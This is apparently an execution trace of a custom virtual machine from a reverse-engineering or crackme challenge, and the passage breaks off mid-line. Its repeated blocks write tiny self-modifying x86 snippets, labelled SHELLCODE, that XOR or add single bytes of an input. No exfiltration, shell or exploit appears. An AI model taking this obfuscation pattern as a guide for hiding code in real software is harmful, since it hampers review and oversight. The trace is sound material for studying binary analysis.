00806a1a: VAL_B <- &VAL_D 00806a32: LEN_B <- 1 00806a4a: 8042cd <- [VAL_B + 0] 00806a62: VAL_B <- 404054 00806a7a: VAL_D <- [VAL_B + 0] 00806a92: 804000 <- 0 00806aaa: 806a92 <- 20008040cc253480 00806ac2: 806a9a <- c3 00806ada: VAL_C <- 806a92 00806af2: TYPE_C <- 1000a0000001a 00806b0a: 806a92 <- SHELLCODE -------------------- 0x0: xor byte ptr [s4], 0x20 -------------------- 00806b22: VAL_B <- a53f62 00806b3a: LEN_B <- 18 00806b52: 806a92 <- [VAL_B + 0] 00806b6a: 804000 <- 0 00806b82: 806b6a <- 14008040cc250480 00806b9a: 806b72 <- c3 00806bb2: VAL_C <- 806b6a 00806bca: TYPE_C <- 1000a0000001a 00806be2: 806b6a <- SHELLCODE -------------------- 0x0: add byte ptr [s4], 0x14 -------------------- 00806bfa: 806b6a <- [VAL_B + 0] 00806c12: VAL_B <- &VAL_D 00806c2a: LEN_B <- 1 00806c42: 8042ce <- [VAL_B + 0] 00806c5a: VAL_B <- 404055 00806c72: VAL_D <- [VAL_B + 0] 00806c8a: 804000 <- 0 00806ca2: 806c8a <- 21008040cc253480 00806cba: 806c92 <- c3 00806cd2: VAL_C <- 806c8a 00806cea: TYPE_C <- 1000a0000001a 00806d02: 806c8a <- SHELLCODE -------------------- 0x0: xor byte ptr [s4], 0x21 -------------------- 00806d1a: VAL_B <- a53f62 00806d32: LEN_B <- 18 00806d4a: 806c8a <- [VAL_B + 0] 00806d62: 804000 <- 0 00806d7a: 806d62 <- 15008040cc250480 00806d92: 806d6a <- c3 00806daa: VAL_C <- 806d62 00806dc2: TYPE_C <- 1000a0000001a 00806dda: 806d62 <- SHELLCODE -------------------- 0x0: add byte ptr [s4], 0x15 -------------------- 00806df2: 806d62 <- [VAL_B + 0] 00806e0a: VAL_B <- &VAL_D 00806e22: LEN_B <- 1 00806e3a: 8042cf <- [VAL_B + 0] 00806e52: VAL_B <- 404056 00806e6a: VAL_D <- [VAL_B + 0] 00806e82: 804000 <- 0 00806e9a: 806e82 <- 23008040cc253480 00806eb2: 806e8a <- c3 00806eca: VAL_C <- 806e82 00806ee2: TYPE_C <- 1000a0000001a 00806efa: 806e82 <- SHELLCODE -------------------- 0x0: xor byte ptr [s4], 0x23 -------------------- 00806f12: VAL_B <- a53f62 00806f2a: LEN_B <- 18 00806f42: 806e82 <- [VAL_B + 0] 00806f5a: 804000 <- 0 00806f72: 806f5a <- 16008040cc250480 00806f8a: 806f62 <- c3 00806fa2: VAL_C <- 806f5a 00806fba: TYPE_C <- 1000a0000001a 00806fd2: 806f5a <- SHELLCODE -------------------- 0x0: add byte ptr [s4], 0x16 -------------------- 00806fea: 806f5a <- [VAL_B + 0] 00807002: VAL_B <- &VAL_D 0080701a: LEN_B <- 1 00807032: 8042d0 <- [VAL_B + 0] 0080704a: VAL_B <- 404057 00807062: VAL_D <- [VAL_B + 0] 0080707a: 804000 <- 0 00807092: 80707a <- 27008040cc253480 008070aa: 807082 <- c3 008070c2: VAL_C <- 80707a 008070da: TYPE_C <- 1000a0000001a 008070f2: 80707a <- SHELLCODE -------------------- 0x0: xor byte ptr [s4], 0x27 -------------------- 0080710a: VAL_B <- a53f62 00807122: LEN_B <- 18 0080713a: 80707a <- [VAL_B + 0] 00807152: 804000 <- 0 0080716a: 807152 <- 17008040cc250480 00807182: 80715a <- c3 0080719a: VAL_C <- 807152 008071b2: TYPE_C <- 1000a0000001a 008071ca: 807152 <- SHELLCODE -------------------- 0x0: add byte ptr [s4], 0x17 -------------------- 008071e2: 807152 <- [VAL_B + 0] 008071fa: VAL_B <- &VAL_D 00807212: LEN_B <- 1 0080722a: 8042d1 <- [VAL_B + 0] 00807242: VAL_B <- 404058 0080725a: VAL_D <- [VAL_B + 0] 00807272: 804000 <- 0 0080728a: 807272 <- 24008040cc253480 008072a2: 80727a <- c3 008072ba: VAL_C <- 807272 008072d2: TYPE_C <- 1000a0000001a 008072ea: 807272 <- SHELLCODE -------------------- 0x0: xor byte ptr [s4], 0x24 -------------------- 00807302: VAL_B <- a53f62 0080731a: LEN_B <- 18 00807332: 807272 <- [VAL_B + 0] 0080734a: 804000 <- 0 00807362: 80734a <- 18008040cc250480 0080737a: 807352 <- c3 00807392: VAL_C <- 80734a 008073aa: TYPE_C <- 1000a0000001a 008073c2: 80734a <- SHELLCODE -------------------- 0x0: add byte ptr [s4], 0x18 -------------------- 008073da: 80734a <- [VAL_B + 0] 008073f2: VAL_B <- &VAL_D 0080740a: LEN_B <- 1 00807422: 8042d2 <- [VAL_B + 0] 0080743a: VAL_B <- 404059 00807452: VAL_D <- [VAL_B + 0] 0080746a: 804000 <- 0 00807482: 80746a <- 25008040cc253480 0080749a: 807472 <- c3 008074b2: VAL_C <- 80746a 008074ca: TYPE_C <- 1000a0000001a 008074e2: 80746a <- SHELLCODE -------------------- 0x0: xor byte ptr [s4], 0x25 -------------------- 008074fa: VAL_B <- a53f62 00807512: LEN_B <- 18 0080752a: 80746a <- [VAL_B + 0] 00807542: 804000 <- 0 0080755a: 807542 <- 19008040cc250480 00807572: 80754a <- c3 0080758a: VAL_C <- 807542 008075a2: TYPE_C <- 1000a0000001a 008075ba: 807542 <- SHELLCODE -------------------- 0x0: add byte ptr [s4], 0x19 -------------------- 008075d2: 807542 <- [VAL_B + 0] 008075ea: VAL_B <- &VAL_D 00807602: LEN_B <- 1 0080761a: 8042d3 <- [VAL_B + 0] 00807632: VAL_B <- 40405a 0080764a: VAL_D <- [VAL_B + 0] 00807662: 804000 <- 0 0080767a: 807662 <- 26008040cc253480 00807692: 80766a <- c3 008076aa: VAL_C <- 807662 008076c2: TYPE_C <- 1000a0000001a 008076da: 807662 <- SHELLCODE -------------------- 0x0: xor byte ptr [s4], 0x26 -------------------- 008076f2: VAL_B <- a53f62 0080770a: LEN_B <- 18 00807722: 807662 <- [VAL_B + 0] 0080773a: 804000 <- 0 00807752: 80773a <- 1a008040cc250480 0080776a: 807742 <- c3 00807782: VAL_C <- 80773a 0080779a: TYPE_C <- 1000a0000001a 008077b2: 80773a <- SHELLCODE -------------------- 0x0: add byte ptr [s4], 0x1a -------------------- 008077ca: 80773a <- [VAL_B + 0] 008077e2: VAL_B <- &VAL_D 008077fa: LEN_B <- 1 00807812: 8042d4 <- [VAL_B + 0] 0080782a: VAL_B <- 40405b 00807842: VAL_D <- [VAL_B + 0] 0080785a: 804000 <- 0 00807872: 80785a <- 27008040cc253480 0080788a: 807862 <- c3 008078a2: VAL_C <- 80785a 008078ba: TYPE_C <- 1000a0000001a 008078d2: 80785a <- SHELLCODE -------------------- 0x0: xor byte ptr [s4], 0x27 -------------------- 008078ea: VAL_B <- a53f62 00807902: LEN_B <- 18 0080791a: 80785a <- [VAL_B + 0] 00807932: 804000 <- 0 0080794a: 807932 <- 1b008040cc250480 00807962: 80793a <- c3 0080797a: VAL_C <- 807932 00807992: TYPE_C <- 1000a0000001a 008079aa: 807932 <- SHELLCODE -------------------- 0x0: add byte ptr [s4], 0x1b -------------------- 008079c2: 807932 <- [VAL_B + 0] 008079da: VAL_B <- &VAL_D 008079f2: LEN_B <- 1 00807a0a: 8042d5 <- [VAL_B + 0] 00807a22: VAL_D <- 0 00807a3a: 404064 <- 0 00807a52: VAL_E <- 0 00807a6a: VAL_B <- 8042ba 00807a82: LEN_B <- 8 00807a9a: VAL_F <- [VAL_B + 0] 00807ab2: 804000 <- 0 00807aca: 807ab2 <- 70008040fc253480 00807ae2: 807aba <- c3 00807afa: VAL_C <- 807ab2 00807b12: TYPE_C <- 1000a0000001a 00807b2a: 807ab2 <- SHELLCODE -------------------- 0x0: xor byte ptr [0x8040fc], 0x70 -------------------- 00807b42: VAL_B <- a53f62 00807b5a: LEN_B <- 18 00807b72: 807ab2 <- [VAL_B + 0] 00807b8a: VAL_B <- &VAL_F 00807ba2: LEN_B <- 8 00807bba: 807be2 <- [VAL_B + 0] 00807bd2: VAL_E <- VAL_E + 6867666564636261 00807bea: 807be2 <- 0 00807c02: VAL_F <- 0 00807c1a: VAL_B <- 8042bb 00807c32: VAL_F <- [VAL_B + 0] 00807c4a: 804000 <- 0 00807c62: 807c4a <- 7c008040fc253480 00807c7a: 807c52 <- c3 00807c92: VAL_C <- 807c4a 00807caa: TYPE_C <- 1000a0000001a 00807cc2: 807c4a <- SHELLCODE -------------------- 0x0: xor byte ptr [0x8040fc], 0x7c -------------------- 00807cda: VAL_B <- a53f62 00807cf2: LEN_B <- 18 00807d0a: 807c4a <- [VAL_B + 0] 00807d22: VAL_B <- &VAL_F 00807d3a: LEN_B <- 8 00807d52: 807d7a <- [VAL_B + 0] 00807d6a: VAL_E <- VAL_E + 6968676665646362 00807d82: 807d7a <- 0 00807d9a: VAL_F <- 0 00807db2: VAL_B <- 8042bc 00807dca: VAL_F <- [VAL_B + 0] 00807de2: 804000 <- 0 00807dfa: 807de2 <- 73008040fc253480 00807e12: 807dea <- c3 00807e2a: VAL_C <- 807de2 00807e42: TYPE_C <- 1000a0000001a 00807e5a: 807de2 <- SHELLCODE -------------------- 0x0: xor byte ptr [0x8040fc], 0x73 -------------------- 00807e72: VAL_B <- a53f62 00807e8a: LEN_B <- 18 00807ea2: 807de2 <- [VAL_B + 0] 00807eba: VAL_B <- &VAL_F 00807ed2: LEN_B <- 8 00807eea: 807f12 <- [VAL_B + 0] 00807f02: VAL_E <- VAL_E + 6a69686766656463 00807f1a: 807f12 <- 0 00807f32: VAL_F <- 0 00807f4a: VAL_B <- 8042bd 00807f62: VAL_F <- [VAL_B + 0] 00807f7a: 804000 <- 0 00807f92: 807f7a <- 78008040fc253480 00807faa: 807f82 <- c3 00807fc2: VAL_C <- 807f7a 00807fda: TYPE_C <- 1000a0000001a 00807ff2: 807f7a <- SHELLCODE -------------------- 0x0: xor byte ptr [0x8040fc], 0x78 -------------------- 0080800a: VAL_B <- a53f62 00808022: LEN_B <- 18 0080803a: 807f7a <- [VAL_B + 0] 00808052: VAL_B <- &VAL_F 0080806a: LEN_B <- 8 00808082: 8080aa <- [VAL_B + 0] 0080809a: VAL_E <- VAL_E + 6b6a696867666564 008080b2: 8080aa <- 0 008080ca: VAL_F <- 0 008080e2: VAL_B <- 8042be 008080fa: VAL_F <- [VAL_B + 0] 00808112: 804000 <- 0 0080812a: 808112 <- 6f008040fc253480 00808142: 80811a <- c3 0080815a: VAL_C <- 808112 00808172: TYPE_C <- 1000a0000001a 0080818a: 808112 <- SHELLCODE -------------------- 0x0: xor byte ptr [0x8040fc], 0x6f -------------------- 008081a2: VAL_B <- a53f62 008081ba: LEN_B <- 18 008081d2: 808112 <- [VAL_B + 0] 008081ea: VAL_B <- &VAL_F 00808202: LEN_B <- 8 0080821a: 808242 <- [VAL_B + 0] 00808232: VAL_E <- VAL_E + 6c6b6a6968676665 0080824a: 808242 <- 0 00808262: VAL_F <- 0 0080827a: VAL_B <- 8042bf 00808292: VAL_F <- [VAL_B + 0] 008082aa: 804000 <- 0 008082c2: 8082aa <- 27008040fc253480 008082da: 8082b2 <- c3 008082f2: VAL_C <- 8082aa 0080830a: TYPE_C <- 1000a0000001a 00808322: 8082aa <- SHELLCODE -------------------- 0x0: xor byte ptr [0x8040fc], 0x27 -------------------- 0080833a: VAL_B <- a53f62 00808352: LEN_B <- 18 0080836a: 8082aa <- [VAL_B + 0] 00808382: VAL_B <- &VAL_F 0080839a: LEN_B <- 8 008083b2: 8083da <- [VAL_B + 0] 008083ca: VAL_E <- VAL_E + 6d6c6b6a69686766 008083e2: 8083da <- 0 008083fa: VAL_F <- 0 00808412: VAL_B <- 8042c0 0080842a: VAL_F <- [VAL_B + 0] 00808442: 804000 <- 0 0080845a: 808442 <- 2a008040fc253480 00808472: 80844a <- c3 0080848a: VAL_C <- 808442 008084a2: TYPE_C <- 1000a0000001a 008084ba: 808442 <- SHELLCODE -------------------- 0x0: xor byte ptr [0x8040fc], 0x2a -------------------- 008084d2: VAL_B <- a53f62 008084ea: LEN_B <- 18 00808502: 808442 <- [VAL_B + 0] 0080851a: VAL_B <- &VAL_F 00808532: LEN_B <- 8 0080854a: 808572 <- [VAL_B + 0] 00808562: VAL_E <- VAL_E + 6e6d6c6b6a696867 0080857a: 808572 <- 0 00808592: VAL_F <- 0 008085aa: VAL_B <- 8042c1 008085c2: VAL_F <- [VAL_B + 0] 008085da: 804000 <- 0 008085f2: 8085da <- 2c008040fc253480 0080860a: 8085e2 <- c3 00808622: VAL_C <- 8085da 0080863a: TYPE_C <- 1000a0000001a 00808652: 8085da <- SHELLCODE -------------------- 0x0: xor byte ptr [0x8040fc], 0x2c -------------------- 0080866a: VAL_B <- a53f62 00808682: LEN_B <- 18 0080869a: 8085da <- [VAL_B + 0] 008086b2: VAL_B <- &VAL_F 008086ca: LEN_B <- 8 008086e2: 80870a <- [VAL_B + 0] 008086fa: VAL_E <- VAL_E + 6f6e6d6c6b6a6968 00808712: 80870a <- 0 0080872a: VAL_F <- 0 00808742: VAL_B <- 8042c2 0080875a: VAL_F <- [VAL_B + 0] 00808772: 804000 <- 0 0080878a: 808772 <- 7f008040fc253480 008087a2: 80877a <- c3 008087ba: VAL_C <- 808772 008087d2: TYPE_C <- 1000a0000001a 008087ea: 808772 <- SHELLCODE -------------------- 0x0: xor byte ptr [0x8040fc], 0x7f -------------------- 00808802: VAL_B <- a53f62 0080881a: LEN_B <- 18 00808832: 808772 <- [VAL_B + 0] 0080884a: VAL_B <- &VAL_F 00808862: LEN_B <- 8 0080887a: 8088a2 <- [VAL_B + 0] 00808892: VAL_E <- VAL_E + 706f6e6d6c6b6a69 008088aa: 8088a2 <- 0 008088c2: VAL_F <- 0 008088da: VAL_B <- 8042c3 008088f2: VAL_F <- [VAL_B + 0] 0080890a: 804000 <- 0 00808922: 80890a <- 35008040fc253480 0080893a: 808912 <- c3 00808952: VAL_C <- 80890a 0080896a: TYPE_C <- 1000a0000001a 00808982: 80890a <- SHELLCODE -------------------- 0x0: xor byte ptr [0x8040fc], 0x35 -------------------- 0080899a: VAL_B <- a53f62 008089b2: LEN_B <- 18 008089ca: 80890a <- [VAL_B + 0] 008089e2: VAL_B <- &VAL_F 008089fa: LEN_B <- 8 00808a12: 808a3a <- [VAL_B + 0] 00808a2a: VAL_E <- VAL_E + 71706f6e6d6c6b6a 00808a42: 808a3a <- 0 00808a5a: VAL_F <- 0 00808a72: VAL_B <- 8042c4 00808a8a: VAL_F <- [VAL_B + 0] 00808aa2: 804000 <- 0 00808aba: 808aa2 <- 2d008040fc253480 00808ad2: 808aaa <- c3 00808aea: VAL_C <- 808aa2 00808b02: TYPE_C <- 1000a0000001a 00808b1a: 808aa2 <- SHELLCODE -------------------- 0x0: xor byte ptr [0x8040fc], 0x2d -------------------- 00808b32: VAL_B <- a53f62 00808b4a: LEN_B <- 18 00808b62: 808aa2 <- [VAL_B + 0] 00808b7a: VAL_B <- &VAL_F 00808b92: LEN_B <- 8 00808baa: 808bd2 <- [VAL_B + 0] 00808bc2: VAL_E <- VAL_E + 7271706f6e6d6c6b 00808bda: 808bd2 <- 0 00808bf2: VAL_F <- 0 00808c0a: VAL_B <- 8042c5 00808c22: VAL_F <- [VAL_B + 0] 00808c3a: 804000 <- 0 00808c52: 808c3a <- 32008040fc253480 00808c6a: 808c42 <- c3 00808c82: VAL_C <- 808c3a 00808c9a: TYPE_C <- 1000a0000001a 00808cb2: 808c3a <- SHELLCODE -------------------- 0x0: xor byte ptr [0x8040fc], 0x32 -------------------- 00808cca: VAL_B <- a53f62 00808ce2: LEN_B <- 18 00808cfa: 808c3a <- [VAL_B + 0] 00808d12: VAL_B <- &VAL_F 00808d2a: LEN_B <- 8 00808d42: 808d6a <- [VAL_B + 0] 00808d5a: VAL_E <- VAL_E + 737271706f6e6d6c 00808d72: 808d6a <- 0 00808d8a: VAL_F <- 0 00808da2: VAL_B <- 8042c6 00808dba: VAL_F <- [VAL_B + 0] 00808dd2: 804000 <- 0 00808dea: 808dd2 <- 37008040fc253480 00808e02: 808dda <- c3 00808e1a: VAL_C <- 808dd2 00808e32: TYPE_C <- 1000a0000001a 00808e4a: 808dd2 <- SHELLCODE -------------------- 0x0: xor byte ptr [0x8040fc], 0x37 -------------------- 00808e62: VAL_B <- a53f62 00808e7a: LEN_B <- 18 00808e92: 808dd2 <- [VAL_B + 0] 00808eaa: VAL_B <- &VAL_F 00808ec2: LEN_B <- 8 00808eda: 808f02 <- [VAL_B + 0] 00808ef2: VAL_E <- VAL_E + 74737271706f6e6d 00808f0a: 808f02 <- 0 00808f22: VAL_F <- 0 00808f3a: VAL_B <- 8042c7 00808f52: VAL_F <- [VAL_B + 0] 00808f6a: 804000 <- 0 00808f82: 808f6a <- 3b008040fc253480 00808f9a: 808f72 <- c3 00808fb2: VAL_C <- 808f6a 00808fca: TYPE_C <- 1000a0000001a 00808fe2: 808f6a <- SHELLCODE -------------------- 0x0: xor byte ptr [0x8040fc], 0x3b -------------------- 00808ffa: VAL_B <- a53f62 00809012: LEN_B <- 18 0080902a: 808f6a <- [VAL_B + 0] 00809042: VAL_B <- &VAL_F 0080905a: LEN_B <- 8 00809072: 80909a <- [VAL_B + 0] 0080908a: VAL_E <- VAL_E + 7574737271706f6e 008090a2: 80909a <- 0 008090ba: VAL_F <- 0 008090d2: VAL_B <- 8042c8 008090ea: VAL_F <- [VAL_B + 0] 00809102: 804000 <- 0 0080911a: 809102 <- 22008040fc253480 00809132: 80910a <- c3 0080914a: VAL_C <- 809102 00809162: TYPE_C <- 1000a0000001a 0080917a: 809102 <- SHELLCODE -------------------- 0x0: xor byte ptr [0x8040fc], 0x22 -------------------- 00809192: VAL_B <- a53f62 008091aa: LEN_B <- 18 008091c2: 809102 <- [VAL_B + 0] 008091da: VAL_B <- &VAL_F 008091f2: LEN_B <- 8 0080920a: 809232 <- [VAL_B + 0] 00809222: VAL_E <- VAL_E + 767574737271706f 0080923a: 809232 <- 0 00809252: VAL_F <- 0 0080926a: VAL_B <- 8042c9 00809282: VAL_F <- [VAL_B + 0] 0080929a: 804000 <- 0 008092b2: 80929a <- 59008040fc253480 008092ca: 8092a2 <- c3 008092e2: VAL_C <- 80929a 008092fa: TYPE_C <- 1000a0000001a 00809312: 80929a <- SHELLCODE -------------------- 0x0: xor byte ptr [0x8040fc], 0x59 -------------------- 0080932a: VAL_B <- a53f62 00809342: LEN_B <- 18 0080935a: 80929a <- [VAL_B + 0] 00809372: VAL_B <- &VAL_F 0080938a: LEN_B <- 8 008093a2: 8093ca <- [VAL_B + 0] 008093ba: VAL_E <- VAL_E + 7776757473727170 008093d2: 8093ca <- 0 008093ea: VAL_F <- 0 00809402: VAL_B <- 8042ca 0080941a: VAL_F <- [VAL_B + 0] 00809432: 804000 <- 0 0080944a: 809432 <- 53008040fc253480 00809462: 80943a <- c3 0080947a: VAL_C <- 809432 00809492: TYPE_C <- 1000a0000001a 008094aa: 809432 <- SHELLCODE -------------------- 0x0: xor byte ptr [0x8040fc], 0x53 -------------------- 008094c2: VAL_B <- a53f62 008094da: LEN_B <- 18 008094f2: 809432 <- [VAL_B + 0] 0080950a: VAL_B <- &VAL_F 00809522: LEN_B <- 8 0080953a: 809562 <- [VAL_B + 0] 00809552: VAL_E <- VAL_E + 7877767574737271 0080956a: 809562 <- 0 00809582: VAL_F <- 0 0080959a: VAL_B <- 8042cb 008095b2: VAL_F <- [VAL_B + 0] 008095ca: 804000 <- 0 008095e2: 8095ca <- 8e008040fc253480 008095fa: 8095d2 <- c3 00809612: VAL_C <- 8095ca 0080962a: TYPE_C <- 1000a0000001a 00809642: 8095ca <- SHELLCODE -------------------- 0x0: xor byte ptr [0x8040fc], 0x8e -------------------- 0080965a: VAL_B <- a53f62 00809672: LEN_B <- 18 0080968a: 8095ca <- [VAL_B + 0] 008096a2: VAL_B <- &VAL_F 008096ba: LEN_B <- 8 008096d2: 8096fa <- [VAL_B + 0] 008096ea: VAL_E <- VAL_E + 7978777675747372 00809702: 8096fa <- 0 0080971a: VAL_F <- 0 00809732: VAL_B <- 8042cc 0080974a: VAL_F <- [VAL_B + 0] 00809762: 804000 <- 0 0080977a: 809762 <- 3d008040fc253480 00809792: 80976a <- c3 008097aa: VAL_C <- 809762 008097c2: TYPE_C <- 1000a0000001a 008097da: 809762 <- SHELLCODE -------------------- 0x0: xor byte ptr [0x8040fc], 0x3d -------------------- 008097f2: VAL_B <- a53f62 0080980a: LEN_B <- 18 00809822: 809762 <- [VAL_B + 0] 0080983a: VAL_B <- &VAL_F 00809852: LEN_B <- 8 0080986a: 809892 <- [VAL_B + 0] 00809882: VAL_E <- VAL_E + 7a79787776757473 0080989a: 809892 <- 0 008098b2: VAL_F <- 0 008098ca: VAL_B <- 8042cd 008098e2: VAL_F <- [VAL_B + 0] 008098fa: 804000 <- 0 00809912: 8098fa <- 2a008040fc253480 0080992a: 809902 <- c3 00809942: VAL_C <- 8098fa 0080995a: TYPE_C <- 1000a0000001a 00809972: 8098fa <- SHELLCODE -------------------- 0x0: xor byte ptr [0x8040fc], 0x2a -------------------- 0080998a: VAL_B <- a53f62 008099a2: LEN_B <- 18 008099ba: 8098fa <- [VAL_B + 0] 008099d2: VAL_B <- &VAL_F 008099ea: LEN_B <- 8 00809a02: 809a2a <- [VAL_B + 0] 00809a1a: VAL_E <- VAL_E + 7b7a797877767574 00809a32: 809a2a <- 0 00809a4a: VAL_F <- 0 00809a62: VAL_B <- 8042ce 00809a7a: VAL_F <- [VAL_B + 0] 00809a92: 804000 <- 0 00809aaa: 809a92 <- 59008040fc253480 00809ac2: 809a9a <- c3 00809ada: VAL_C <- 809a92 00809af2: TYPE_C <- 1000a0000001a 00809b0a: 809a92 <- SHELLCODE -------------------- 0x0: xor byte ptr [0x8040fc], 0x59 -------------------- 00809b22: VAL_B <- a53f62 00809b3a: LEN_B <- 18 00809b52: 809a92 <- [VAL_B + 0] 00809b6a: VAL_B <- &VAL_F 00809b82: LEN_B <- 8 00809b9a: 809bc2 <- [VAL_B + 0] 00809bb2: VAL_E <- VAL_E + 7c7b7a7978777675 00809bca: 809bc2 <- 0 00809be2: VAL_F <- 0 00809bfa: VAL_B <- 8042cf 00809c12: VAL_F <- [VAL_B + 0] 00809c2a: 804000 <- 0 00809c42: 809c2a <- 27008040fc253480 00809c5a: 809c32 <- c3 00809c72: VAL_C <- 809c2a 00809c8a: TYPE_C <- 1000a0000001a 00809ca2: 809c2a <- SHELLCODE -------------------- 0x0: xor byte ptr [0x8040fc], 0x27 -------------------- 00809cba: VAL_B <- a53f62 00809cd2: LEN_B <- 18 00809cea: 809c2a <- [VAL_B + 0] 00809d02: VAL_B <- &VAL_F 00809d1a: LEN_B <- 8 00809d32: 809d5a <- [VAL_B + 0] 00809d4a: VAL_E <- VAL_E + 7c7b7a79787776 00809d62: 809d5a <- 0 00809d7a: VAL_F <- 0 00809d92: VAL_B <- 8042d0 00809daa: VAL_F <- [VAL_B + 0] 00809dc2: 804000 <- 0 00809dda: 809dc2 <- 2d008040fc253480 00809df2: 809dca <- c3 00809e0a: VAL_C <- 809dc2 00809e22: TYPE_C <- 1000a0000001a 00809e3a: 809dc2 <- SHELLCODE -------------------- 0x0: xor byte ptr [0x8040fc], 0x2d -------------------- 00809e52: VAL_B <- a53f62 00809e6a: LEN_B <- 18 00809e82: 809dc2 <- [VAL_B + 0] 00809e9a: VAL_B <- &VAL_F 00809eb2: LEN_B <- 8 00809eca: 809ef2 <- [VAL_B + 0] 00809ee2: VAL_E <- VAL_E + 7c7b7a797877 00809efa: 809ef2 <- 0 00809f12: VAL_F <- 0 00809f2a: VAL_B <- 8042d1 00809f42: VAL_F <- [VAL_B + 0] 00809f5a: 804000 <- 0 00809f72: 809f5a <- 29008040fc253480 00809f8a: 809f62 <- c3 00809fa2: VAL_C <- 809f5a 00809fba: TYPE_C <- 1000a0000001a 00809fd2: 809f5a <- SHELLCODE -------------------- 0x0: xor byte ptr [0x8040fc], 0x29 -------------------- 00809fea: VAL_B <- a53f62 0080a002: LEN_B <- 18 0080a01a: 809f5a <- [VAL_B + 0] 0080a032: VAL_B <- &VAL_F 0080a04a: LEN_B <- 8 0080a062: 80a08a <- [VAL_B + 0] 0080a07a: VAL_E <- VAL_E + 7c7b7a7978 0080a092: 80a08a <- 0 0080a0aa: VAL_F <- 0 0080a0c2: VAL_B <- 8042d2 0080a0da: VAL_F <- [VAL_B + 0] 0080a0f2: 804000 <- 0 0080a10a: 80a0f2 <- 34008040fc253480 0080a122: 80a0fa <- c3 0080a13a: VAL_C <- 80a0f2 0080a152: TYPE_C <- 1000a0000001a 0080a16a: 80a0f2 <- SHELLCODE -------------------- 0x0: xor byte ptr [0x8040fc], 0x34 -------------------- 0080a182: VAL_B <- a53f62 0080a19a: LEN_B <- 18 0080a1b2: 80a0f2 <- [VAL_B + 0] 0080a1ca: VAL_B <- &VAL_F 0080a1e2: LEN_B <- 8 0080a1fa: 80a222 <- [VAL_B + 0] 0080a212: VAL_E <- VAL_E + 7c7b7a79 0080a22a: 80a222 <- 0 0080a242: VAL_F <- 0 0080a25a: VAL_B <- 8042d3 0080a272: VAL_F <- [VAL_B + 0] 0080a28a: 804000 <- 0 0080a2a2: 80a28a <- 2d008040fc253480 0080a2ba: 80a292 <- c3 0080a2d2: VAL_C <- 80a28a 0080a2ea: TYPE_C <- 1000a0000001a 0080a302: 80a28a <- SHELLCODE -------------------- 0x0: xor byte ptr [0x8040fc], 0x2d -------------------- 0080a31a: VAL_B <- a53f62 0080a332: LEN_B <- 18 0080a34a: 80a28a <- [VAL_B + 0] 0080a362: VAL_B <- &VAL_F 0080a37a: LEN_B <- 8 0080a392: 80a3ba <- [VAL_B + 0] 0080a3aa: VAL_E <- VAL_E + 8000000007c7b7a 0080a3c2: 80a3ba <- 0 0080a3da: VAL_F <- 0 0080a3f2: VAL_B <- 8042d4 0080a40a: VAL_F <- [VAL_B + 0] 0080a422: 804000 <- 0 0080a43a: 80a422 <- 61008040fc253480 0080a452: 80a42a <- c3 0080a46a: VAL_C <- 80a422 0080a482: TYPE_C <- 1000a0000001a 0080a49a: 80a422 <- SHELLCODE -------------------- 0x0: xor byte ptr [0x8040fc], 0x61 -------------------- 0080a4b2: VAL_B <- a53f62 0080a4ca: LEN_B <- 18 0080a4e2: 80a422 <- [VAL_B + 0] 0080a4fa: VAL_B <- &VAL_F 0080a512: LEN_B <- 8 0080a52a: 80a552 <- [VAL_B + 0] 0080a542: VAL_E <- VAL_E + 8000000007c7b 0080a55a: 80a552 <- 0 0080a572: VAL_F <- 0 0080a58a: VAL_B <- 8042d5 0080a5a2: VAL_F <- [VAL_B + 0] 0080a5ba: 804000 <- 0 0080a5d2: 80a5ba <- 32008040fc253480 0080a5ea: 80a5c2 <- c3 0080a602: VAL_C <- 80a5ba 0080a61a: TYPE_C <- 1000a0000001a 0080a632: 80a5ba <- SHELLCODE -------------------- 0x0: xor byte ptr [0x8040fc], 0x32 -------------------- 0080a64a: VAL_B <- a53f62 0080a662: LEN_B <- 18 0080a67a: 80a5ba <- [VAL_B + 0] 0080a692: VAL_B <- &VAL_F 0080a6aa: LEN_B <- 8 0080a6c2: 80a6ea <- [VAL_B + 0] 0080a6da: VAL_E <- VAL_E + 8000000007c 0080a6f2: 80a6ea <- 0 0080a70a: VAL_F <- 0 0080a722: VAL_B <- 40405c 0080a73a: VAL_F <- [VAL_B + 0] 0080a752: VAL_B <- 40405d 0080a76a: VAL_G <- [VAL_B + 0] 0080a782: VAL_H <- 0 0080a79a: VAL_B <- &VAL_H 0080a7b2: 80a7da <- [VAL_B + 0] 0080a7ca: VAL_H <- VAL_H + 0 0080a7e2: 80a7da <- 0 0080a7fa: VAL_B <- &VAL_F 0080a812: 80a83a <- [VAL_B + 0] 0080a82a: VAL_H <- VAL_H + 0 0080a842: 80a83a <- 0 0080a85a: VAL_I <- 0 0080a872: VAL_B <- &VAL_I 0080a88a: 80a8b2 <- [VAL_B + 0] 0080a8a2: VAL_I <- VAL_I + 0 0080a8ba: 80a8b2 <- 0 0080a8d2: VAL_B <- &VAL_G 0080a8ea: 80a912 <- [VAL_B + 0] 0080a902: VAL_I <- VAL_I + 0 0080a91a: 80a912 <- 0 0080a932: VAL_B <- &VAL_I 0080a94a: 80a972 <- [VAL_B + 0] 0080a962: VAL_J <- VAL_H + 0 0080a97a: 80a972 <- 0 0080a992: 804000 <- 0 0080a9aa: 80a992 <- 6c0080415c253480 0080a9c2: 80a99a <- c3 0080a9da: VAL_C <- 80a992 0080a9f2: TYPE_C <- 1000a0000001a 0080aa0a: 80a992 <- SHELLCODE -------------------- 0x0: xor byte ptr [0x80415c], 0x6c -------------------- 0080aa22: VAL_B <- a53f62 0080aa3a: LEN_B <- 18 0080aa52: 80a992 <- [VAL_B + 0] 0080aa6a: VAL_B <- &VAL_J 0080aa82: LEN_B <- 8 0080aa9a: 80aac2 <- [VAL_B + 0] 0080aab2: VAL_E <- VAL_E + 0 0080aaca: 80aac2 <- 0 0080aae2: VAL_F <- 0 0080aafa: VAL_G <- 0 0080ab12: VAL_H <- 0 0080ab2a: VAL_I <- 0 0080ab42: VAL_J <- 0 0080ab5a: VAL_B <- 40405c 0080ab72: VAL_F <- [VAL_B + 0] 0080ab8a: VAL_B <- 40405d 0080aba2: VAL_G <- [VAL_B + 0] 0080abba: VAL_H <- 0 0080abd2: VAL_B <- &VAL_H 0080abea: 80ac12 <- [VAL_B + 0] 0080ac02: VAL_H <- VAL_H + 0 0080ac1a: 80ac12 <- 0 0080ac32: VAL_B <- &VAL_F 0080ac4a: 80ac72 <- [VAL_B + 0] 0080ac62: VAL_H <- VAL_H + 0 0080ac7a: 80ac72 <- 0 0080ac92: VAL_B <- &VAL_H 0080acaa: 80acd2 <- 